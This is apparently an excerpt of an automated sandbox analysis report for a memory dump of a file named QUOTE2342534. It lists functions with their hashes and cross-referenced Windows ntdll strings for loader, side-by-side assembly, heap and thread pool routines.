                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                                                                                                                                • Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                                                                                                                                                                • Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
                                                                                                                                                                                                                                                Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                                                                                • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                                                                                                                                • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                                                                                                                                                                                                                                Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                                                                                                                                • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                                                                                                                                • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                                                                                                                                                                                                                                Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • VerifierFlags, xrefs: 017A8C50
                                                                                                                                                                                                                                                • VerifierDebug, xrefs: 017A8CA5
                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                                                                                                                                                                                • HandleTraces, xrefs: 017A8C8F
                                                                                                                                                                                                                                                • VerifierDlls, xrefs: 017A8CBD
                                                                                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                                                                                                                                • Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                                                                                                                                                                                                                • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                                                                                                                                                                                                                Function 0172EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                                                                                                                                • Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                                                                                                                                • Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40
                                                                                                                                                                                                                                                Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                                                                                • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                                                                                                                                • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                                                                                                                                                                                                                                Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 01716496
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-204845295
                                                                                                                                                                                                                                                • Opcode ID: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                                                                                                                                                                                                                • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                                                                                                                                                                                                                                Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                                                                                • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                                                                                                                                • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                                                                                                                                                                                                                                Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                • API String ID: 0-475462383
                                                                                                                                                                                                                                                • Opcode ID: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                                                                                                                                                                                                                • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                                                                                                                                                                                                                                Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                                                                                                                                • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                                                                                                                                • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                                                                                                                                                                                                                                Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                                                                                • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                                                                                                                                • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                                                                                                                                                                                                                                Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 01758422
                                                                                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                                                                                                                                                                                • @, xrefs: 01758591
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                                                                                • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                                                                                                                                • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                                                                                                                                                                                                                                Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • .Local, xrefs: 017528D8
                                                                                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                                                                                                                                • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                                                                                                                                • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                                                                                                                                                                                                                                Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                                                                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                                                                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                                                                                • API String ID: 0-1245972979
                                                                                                                                                                                                                                                • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                                                                                                                                • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                                                                                                                                                                                                                                Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                                                                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                                                                                                                                • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                                                                                                                                • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                                                                                                                                                                                                                                Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                                                                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 01742462
                                                                                                                                                                                                                                                • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-176724104
                                                                                                                                                                                                                                                • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                                                                                                                                • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                                                                                                                                                                                                                                Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
